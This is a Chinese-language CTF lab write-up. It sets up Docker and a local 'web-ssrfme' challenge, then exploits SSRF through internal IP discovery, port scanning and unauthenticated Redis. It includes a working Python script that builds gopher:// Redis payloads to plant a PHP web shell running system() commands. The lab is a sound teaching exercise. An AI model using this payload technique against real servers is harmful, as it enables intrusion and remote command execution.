1. docker配置
1.1 安装
root@abyss:~# apt install docker.io
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
bridge-utils containerd git git-man liberror-perl pigz runc ubuntu-fan
Suggested packages:
ifupdown aufs-tools btrfs-progs cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2 docker-doc rinse zfs-fuse | zfsutils git-daemon-run
| git-daemon-sysvinit git-doc git-email git-gui gitk gitweb git-cvs git-mediawiki git-svn
The following NEW packages will be installed:
bridge-utils containerd docker.io git git-man liberror-perl pigz runc ubuntu-fan
0 upgraded, 9 newly installed, 0 to remove and 67 not upgraded.
Need to get 82.5 MB of archives.
After this operation, 321 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 pigz amd64 2.6-1 [63.6 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 bridge-utils amd64 1.7-1ubuntu3 [34.4 kB]
Get:3 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 runc amd64 1.1.12-0ubuntu2~22.04.1 [8,405 kB]
Get:4 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 containerd amd64 1.7.24-0ubuntu1~22.04.2 [37.3 MB]
Get:5 http://cn.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 docker.io amd64 26.1.3-0ubuntu1~22.04.1 [32.5 MB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 liberror-perl all 0.17029-1 [26.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git-man all 1:2.34.1-1ubuntu1.12 [955 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git amd64 1:2.34.1-1ubuntu1.12 [3,165 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 ubuntu-fan all 0.12.16 [35.2 kB]
Fetched 82.5 MB in 2min 48s (490 kB/s)
Preconfiguring packages ...
Selecting previously unselected package pigz.
(Reading database ... 211881 files and directories currently installed.)
Preparing to unpack .../0-pigz_2.6-1_amd64.deb ...
Unpacking pigz (2.6-1) ...
Selecting previously unselected package bridge-utils.
Preparing to unpack .../1-bridge-utils_1.7-1ubuntu3_amd64.deb ...
Unpacking bridge-utils (1.7-1ubuntu3) ...
Selecting previously unselected package runc.
Preparing to unpack .../2-runc_1.1.12-0ubuntu2~22.04.1_amd64.deb ...
Unpacking runc (1.1.12-0ubuntu2~22.04.1) ...
Selecting previously unselected package containerd.
Preparing to unpack .../3-containerd_1.7.24-0ubuntu1~22.04.2_amd64.deb ...
Unpacking containerd (1.7.24-0ubuntu1~22.04.2) ...
Selecting previously unselected package docker.io.
Preparing to unpack .../4-docker.io_26.1.3-0ubuntu1~22.04.1_amd64.deb ...
Unpacking docker.io (26.1.3-0ubuntu1~22.04.1) ...
Selecting previously unselected package liberror-perl.
Preparing to unpack .../5-liberror-perl_0.17029-1_all.deb ...
Unpacking liberror-perl (0.17029-1) ...
Selecting previously unselected package git-man.
Preparing to unpack .../6-git-man_1%3a2.34.1-1ubuntu1.12_all.deb ...
Unpacking git-man (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package git.
Preparing to unpack .../7-git_1%3a2.34.1-1ubuntu1.12_amd64.deb ...
Unpacking git (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package ubuntu-fan.
Preparing to unpack .../8-ubuntu-fan_0.12.16_all.deb ...
Unpacking ubuntu-fan (0.12.16) ...
Setting up runc (1.1.12-0ubuntu2~22.04.1) ...
Setting up liberror-perl (0.17029-1) ...
Setting up bridge-utils (1.7-1ubuntu3) ...
Setting up pigz (2.6-1) ...
Setting up git-man (1:2.34.1-1ubuntu1.12) ...
Setting up containerd (1.7.24-0ubuntu1~22.04.2) ...
Created symlink /etc/systemd/system/multi-user.target.wants/containerd.service → /lib/systemd/system/containerd.service.
Setting up ubuntu-fan (0.12.16) ...
Created symlink /etc/systemd/system/multi-user.target.wants/ubuntu-fan.service → /lib/systemd/system/ubuntu-fan.service.
Setting up docker.io (26.1.3-0ubuntu1~22.04.1) ...
Adding group `docker' (GID 137) ...
Done.
Created symlink /etc/systemd/system/multi-user.target.wants/docker.service → /lib/systemd/system/docker.service.
Created symlink /etc/systemd/system/sockets.target.wants/docker.socket → /lib/systemd/system/docker.socket.
Setting up git (1:2.34.1-1ubuntu1.12) ...
Processing triggers for man-db (2.10.2-1) ...
1.2 配置
root@abyss:~# cd /etc/systemd/system/
root@abyss:/etc/systemd/system# ls -all
total 128
drwxr-xr-x 21 root root 4096 4月 7 15:58 .
drwxr-xr-x 5 root root 4096 4月 5 23:55 ..
drwxr-xr-x 2 root root 4096 9月 11 2024 bluetooth.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 cloud-final.service.wants
lrwxrwxrwx 1 root root 42 4月 5 23:50 dbus-fi.w1.wpa_supplicant1.service -> /lib/systemd/system/wpa_supplicant.service
lrwxrwxrwx 1 root root 37 4月 5 23:50 dbus-org.bluez.service -> /lib/systemd/system/bluetooth.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.Avahi.service -> /lib/systemd/system/avahi-daemon.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.ModemManager1.service -> /lib/systemd/system/ModemManager.service
lrwxrwxrwx 1 root root 53 4月 5 23:50 dbus-org.freedesktop.nm-dispatcher.service -> /lib/systemd/system/NetworkManager-dispatcher.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.oom1.service -> /lib/systemd/system/systemd-oomd.service
lrwxrwxrwx 1 root root 44 4月 5 23:50 dbus-org.freedesktop.resolve1.service -> /lib/systemd/system/systemd-resolved.service
lrwxrwxrwx 1 root root 36 4月 5 23:50 dbus-org.freedesktop.thermald.service -> /lib/systemd/system/thermald.service
lrwxrwxrwx 1 root root 45 4月 5 23:50 dbus-org.freedesktop.timesync1.service -> /lib/systemd/system/systemd-timesyncd.service
lrwxrwxrwx 1 root root 32 4月 5 23:50 display-manager.service -> /lib/systemd/system/gdm3.service
drwxr-xr-x 2 root root 4096 9月 11 2024 display-manager.service.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 emergency.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 final.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 getty.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 graphical.target.wants
drwxr-xr-x 2 root root 4096 4月 9 11:10 multi-user.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 network-online.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 oem-config.service.wants
drwxr-xr-x 2 root root 4096 4月 5 23:55 open-vm-tools.service.requires
drwxr-xr-x 2 root root 4096 9月 11 2024 paths.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 printer.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 rescue.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 sleep.target.wants
-rw-r--r-- 1 root root 311 9月 11 2024 snap-bare-5.mount
-rw-r--r-- 1 root root 326 9月 11 2024 snap-core22-1612.mount
-rw-r--r-- 1 root root 326 4月 7 15:58 snap-core22-1802.mount
drwxr-xr-x 2 root root 4096 4月 7 15:58 snapd.mounts.target.wants
-rw-r--r-- 1 root root 329 9月 11 2024 snap-firefox-4848.mount
-rw-r--r-- 1 root root 344 9月 11 2024 'snap-gnome\x2d42\x2d2204-176.mount'
-rw-r--r-- 1 root root 359 9月 11 2024 'snap-gtk\x2dcommon\x2dthemes-1535.mount'
-rw-r--r-- 1 root root 326 9月 11 2024 snap-snapd-21759.mount
-rw-r--r-- 1 root root 380 9月 11 2024 'snap-snapd\x2ddesktop\x2dintegration-178.mount'
-rw-r--r-- 1 root root 380 4月 7 15:58 'snap-snapd\x2ddesktop\x2dintegration-253.mount'
-rw-r--r-- 1 root root 338 9月 11 2024 'snap-snap\x2dstore-1113.mount'
-rw-r--r-- 1 root root 338 4月 7 15:58 'snap-snap\x2dstore-1216.mount'
drwxr-xr-x 2 root root 4096 4月 9 11:10 sockets.target.wants
lrwxrwxrwx 1 root root 31 4月 5 23:57 sshd.service -> /lib/systemd/system/ssh.service
lrwxrwxrwx 1 root root 9 4月 5 23:50 sudo.service -> /dev/null
drwxr-xr-x 2 root root 4096 4月 5 23:54 sysinit.target.wants
lrwxrwxrwx 1 root root 35 4月 5 23:50 syslog.service -> /lib/systemd/system/rsyslog.service
drwxr-xr-x 2 root root 4096 4月 6 00:37 timers.target.wants
lrwxrwxrwx 1 root root 41 4月 5 23:55 vmtoolsd.service -> /lib/systemd/system/open-vm-tools.service
root@abyss:/etc/systemd/system# mkdir docker.service.d
root@abyss:/etc/systemd/system# cd docker.service.d/
root@abyss:/etc/systemd/system/docker.service.d# ls -all
total 8
drwxr-xr-x 2 root root 4096 4月 9 11:11 .
drwxr-xr-x 22 root root 4096 4月 9 11:11 ..
root@abyss:/etc/systemd/system/docker.service.d# vim http-proxy.conf
root@abyss:/etc/systemd/system/docker.service.d# cat http-proxy.conf
[Service]
Environment="HTTP_PROXY=http://192.168.142.1:7897"
Environment="HTTPS_PROXY=http://192.168.142.1:7897"
Environment="NO_PROXY=localhost,127.0.0.1,*.example.com"
root@abyss:/etc/systemd/system/docker.service.d# 1.3 重启docker并测试
root@abyss:/etc/systemd/system/docker.service.d# systemctl daemon-reload
root@abyss:/etc/systemd/system/docker.service.d# systemctl restart docker
root@abyss:/etc/systemd/system/docker.service.d# ps -ef | grep docker
root 6029 1 2 11:32 ? 00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 6184 4730 0 11:32 pts/1 00:00:00 grep --color=auto docker
# 用 docker 找一下 nginx 试一下
root@abyss:/etc/systemd/system/docker.service.d# docker search nginx
NAME DESCRIPTION STARS OFFICIAL
nginx Official build of Nginx. 20738 [OK]
nginx/nginx-ingress NGINX and NGINX Plus Ingress Controllers fo… 103
nginx/nginx-prometheus-exporter NGINX Prometheus Exporter for NGINX and NGIN… 49
nginx/unit This repository is retired, use the Docker o… 65
nginx/nginx-ingress-operator NGINX Ingress Operator for NGINX and NGINX P… 2
nginx/nginx-quic-qns NGINX QUIC interop 1
nginx/nginxaas-loadbalancer-kubernetes 1
nginx/unit-preview Unit preview features 0
bitnami/nginx Bitnami container image for NGINX 199
ubuntu/nginx Nginx, a high-performance reverse proxy & we… 128
bitnamicharts/nginx Bitnami Helm chart for NGINX Open Source 0
rancher/nginx 2
kasmweb/nginx An Nginx image based off nginx:alpine and in… 8
linuxserver/nginx An Nginx container, brought to you by LinuxS… 229
dtagdevsec/nginx T-Pot Nginx 0
paketobuildpacks/nginx 0
vmware/nginx 2
chainguard/nginx Build, ship and run secure software with Cha… 4
droidwiki/nginx 0
gluufederation/nginx A customized NGINX image containing a consu… 1
intel/nginx 0
circleci/nginx This image is for internal use 2
corpusops/nginx https://github.com/corpusops/docker-images/ 1
antrea/nginx Nginx server used for Antrea e2e testing 0
docksal/nginx Nginx service image for Docksal 0 2. ssrf环境配置
2.1 准备文件并解压
root@abyss:~# ls -all
total 3004
drwx------ 6 root root 4096 4月 8 20:19 .
drwxr-xr-x 20 root root 4096 4月 5 23:52 ..
-rw-r--r-- 1 root root 3015411 4月 8 20:19 web-ssrfme.tar.gz
root@abyss:~# mkdir web_ssrf
root@abyss:~# ls -all
drwxr-xr-x 2 root root 4096 4月 9 10:59 web_ssrf
root@abyss:~# mv web-ssrfme.tar.gz web_ssrf/
root@abyss:~# ls -all
drwxr-xr-x 2 root root 4096 4月 9 10:59 web_ssrf
root@abyss:~# cd web_ssrf/
root@abyss:~/web_ssrf# ls -all
total 2956
drwxr-xr-x 2 root root 4096 4月 9 10:59 .
drwx------ 7 root root 4096 4月 9 10:59 ..
-rw-r--r-- 1 root root 3015411 4月 8 20:19 web-ssrfme.tar.gz
root@abyss:~/web_ssrf# tar -zxvf web-ssrfme.tar.gz
root@abyss:~/web_ssrf# ls -all
total 2960
drwxr-xr-x 3 root root 4096 4月 9 10:59 .
drwx------ 7 root root 4096 4月 9 10:59 ..
drwxr-xr-x 4 root root 4096 2月 23 2022 web-ssrfme
-rw-r--r-- 1 root root 3015411 4月 8 20:19 web-ssrfme.tar.gz
root@abyss:~/web_ssrf# cd web-ssrfme/
root@abyss:~/web_ssrf/web-ssrfme# ls -all
total 20
drwxr-xr-x 4 root root 4096 2月 23 2022 .
drwxr-xr-x 3 root root 4096 4月 9 10:59 ..
-rw-r--r-- 1 root root 168 2月 17 2022 docker-compose.yml
drwxr-xr-x 3 root root 4096 2月 23 2022 redis
drwxr-xr-x 4 root root 4096 2月 17 2022 web2.2 拉取环境
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Command 'docker-compose' not found, but can be installed with:
snap install docker # version 27.5.1, or
apt install docker-compose # version 1.29.2-1 // 建议使用这种方法,上面那种方法容易出问题
See 'snap info docker' for additional versions.
// 显示没有docker-compose ,安装一下
root@abyss:~/web_ssrf/web-ssrfme# apt install docker-compose
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools python3-texttable
python3-websocket
Suggested packages:
python-attr-doc python-jsonschema-doc python-setuptools-doc
The following NEW packages will be installed:
docker-compose python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools
python3-texttable python3-websocket
0 upgraded, 12 newly installed, 0 to remove and 67 not upgraded.
Need to get 911 kB of archives.
After this operation, 4,842 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 python3-distutils all 3.10.8-1~22.04 [139 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-websocket all 1.2.3-1 [34.7 kB]
Get:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docker all 5.0.3-1 [89.3 kB]
Get:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dockerpty all 0.4.1-2 [11.1 kB]
Get:5 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docopt all 0.6.2-4 [26.9 kB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dotenv all 0.19.2-1 [20.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-attr all 21.2.0-1 [44.0 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 python3-setuptools all 59.6.0-1.2ubuntu0.22.04.2 [340 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-pyrsistent amd64 0.18.1-1build1 [55.5 kB]
Get:10 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-jsonschema all 3.2.0-0ubuntu2 [43.1 kB]
Get:11 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-texttable all 1.6.4-1 [11.4 kB]
Get:12 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 docker-compose all 1.29.2-1 [95.8 kB]
Fetched 911 kB in 2s (602 kB/s)
Selecting previously unselected package python3-distutils.
(Reading database ... 213203 files and directories currently installed.)
Preparing to unpack .../00-python3-distutils_3.10.8-1~22.04_all.deb ...
Unpacking python3-distutils (3.10.8-1~22.04) ...
Selecting previously unselected package python3-websocket.
Preparing to unpack .../01-python3-websocket_1.2.3-1_all.deb ...
Unpacking python3-websocket (1.2.3-1) ...
Selecting previously unselected package python3-docker.
Preparing to unpack .../02-python3-docker_5.0.3-1_all.deb ...
Unpacking python3-docker (5.0.3-1) ...
Selecting previously unselected package python3-dockerpty.
Preparing to unpack .../03-python3-dockerpty_0.4.1-2_all.deb ...
Unpacking python3-dockerpty (0.4.1-2) ...
Selecting previously unselected package python3-docopt.
Preparing to unpack .../04-python3-docopt_0.6.2-4_all.deb ...
Unpacking python3-docopt (0.6.2-4) ...
Selecting previously unselected package python3-dotenv.
Preparing to unpack .../05-python3-dotenv_0.19.2-1_all.deb ...
Unpacking python3-dotenv (0.19.2-1) ...
Selecting previously unselected package python3-attr.
Preparing to unpack .../06-python3-attr_21.2.0-1_all.deb ...
Unpacking python3-attr (21.2.0-1) ...
Selecting previously unselected package python3-setuptools.
Preparing to unpack .../07-python3-setuptools_59.6.0-1.2ubuntu0.22.04.2_all.deb ...
Unpacking python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Selecting previously unselected package python3-pyrsistent:amd64.
Preparing to unpack .../08-python3-pyrsistent_0.18.1-1build1_amd64.deb ...
Unpacking python3-pyrsistent:amd64 (0.18.1-1build1) ...
Selecting previously unselected package python3-jsonschema.
Preparing to unpack .../09-python3-jsonschema_3.2.0-0ubuntu2_all.deb ...
Unpacking python3-jsonschema (3.2.0-0ubuntu2) ...
Selecting previously unselected package python3-texttable.
Preparing to unpack .../10-python3-texttable_1.6.4-1_all.deb ...
Unpacking python3-texttable (1.6.4-1) ...
Selecting previously unselected package docker-compose.
Preparing to unpack .../11-docker-compose_1.29.2-1_all.deb ...
Unpacking docker-compose (1.29.2-1) ...
Setting up python3-dotenv (0.19.2-1) ...
Setting up python3-distutils (3.10.8-1~22.04) ...
Setting up python3-attr (21.2.0-1) ...
Setting up python3-texttable (1.6.4-1) ...
Setting up python3-docopt (0.6.2-4) ...
Setting up python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Setting up python3-pyrsistent:amd64 (0.18.1-1build1) ...
Setting up python3-websocket (1.2.3-1) ...
Setting up python3-dockerpty (0.4.1-2) ...
Setting up python3-docker (5.0.3-1) ...
Setting up python3-jsonschema (3.2.0-0ubuntu2) ...
Setting up docker-compose (1.29.2-1) ...
Processing triggers for man-db (2.10.2-1) ...
// 拉取环境
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Creating network "web-ssrfme_default" with the default driver
Building redis
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
Install the buildx component to build images with BuildKit:
https://docs.docker.com/go/buildx/
Sending build context to Docker daemon 7.983MB
Step 1/19 : FROM ubuntu:16.04
16.04: Pulling from library/ubuntu
58690f9b18fc: Pull complete
b51569e7c507: Pull complete
da8ef40b9eca: Pull complete
fb15d46c38dc: Pull complete
......
Successfully built 4be6c24dabe9
Successfully tagged ctf/ssrfme:latest
WARNING: Image for service web was built because it did not already exist. To rebuild this image you must use `docker-compose build` or `docker-compose up --build`.
Creating web-ssrfme_redis_1 ... done
Creating web-ssrfme_web_1 ... done
// 看一下docker的映射端口
root@abyss:~/web_ssrf/web-ssrfme# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8da4dc9e2730 ctf/ssrfme "/bin/sh -c 'cd /; .…" 3 minutes ago Up 3 minutes 0.0.0.0:8091->80/tcp, :::8091->80/tcp web-ssrfme_web_1
d05b13308fc8 web-ssrfme_redis "/usr/local/bin/dock…" 3 minutes ago Up 3 minutes 6379/tcp web-ssrfme_redis_1
root@abyss:~/web_ssrf/web-ssrfme# 2.3 访问测试
2.3.1 环境是否配置成功
访问 虚拟机IP地址:docker映射端口号 ,如果看到以上代码,就表明环境配置没有问题。
3. 漏洞分析与复现
3.1 测试一下是否存在ssrf
源码有一个url的get请求,使用www.baidu.com测试一下是否存在ssrf,结果如上所示,是存在的。那么接下来就是确定内网主机IP网段、确定内网主机的存活度,之后通过redis未授权写入文件并获取flag。
3.2 获取内网IP段
源码中有phpinfo();这个函数,通过参数info触发,它是可以打印出主机IP的,试一下
这里打印出来的主机IP是172.18.0.3说明这个内网的网段是172.18.0.x,接下来就检测内网有哪些主机是存活的。
3.3 内网主机检测
使用Yakit尝试爆破,发现IP地址为172.18.0.2的主机处于存活状态,而且它运行着http协议。
但是仅仅知道存活主机还不行,我们还要找到突破口,使用ssrf扫描都端口,看一下有没有redis服务。
3.4 端口扫描
使用Yakit扫描端口发现6379端口有回显-ERR wrong number of arguments for 'get' command 1,这是redis报错。既然有这个报错,就说明主机172.18.0.2还运行着redis服务。那就可以试一下redis未授权访问攻击。
3.5 redis未授权访问攻击
172.18.0.2这个主机及运行http协议,还运行redis,那我们就打一个redis未授权访问。我们先想办法把payload写到172.18.0.2这个主机里面,然后利用ssrf直接访问我们的payload,进而触发它,然后获取flag。
3.5.1 写入payload
由于172.18.0.2这台主机上运行着http协议,所以可以直接测试一下能不能写入html目录下。
payload生成脚本如下:
import urllib.parse
protocol = "gopher://"
ip = "172.18.0.2" # 运行着redis的内网主机ip
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "web.php"
path = "/var/www/html/upload"
passwd = ""
cmd=[
"flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd += CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd += CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.parse.quote(redis_format(x))
print (payload)将输出的内容进行二次url编码,因为这个payload在写入的时候会被url解码两次,浏览器一次,redis一次。如下:
不过html目录似乎不能直接写入文件,这里测试的时候没有任何响应:
然后访问也只是显示以下内容,说明不能写入:
3.5.2 扫描主机
由于html目录不能直接写入payload,所以我们通过BurpSuit扫描一下172.18.0.2这台主机,看一下html下有没有其他的目录,能达成写入payload的条件。
扫描结果如下:
可以看到,这里存在一个upload目录,接下来测试一下写入payload。
3.5.3 再次写入payload
这次使用一个工具来生成payload。Gopherus是GitHub上的一个开源工具,但是在2025来看,相对老了,依赖的是python2,即需要在Ubuntu上安装python2。安装完成之后使用如下:
得到payload之后还用进行二次url编码,然后使用同样的方法写入。之后我到容器里面看了一眼,已经有shell.php这个文件了。
之后浏览器访问
?url=http://172.18.0.2/upload/shell.php就可以得到flag了。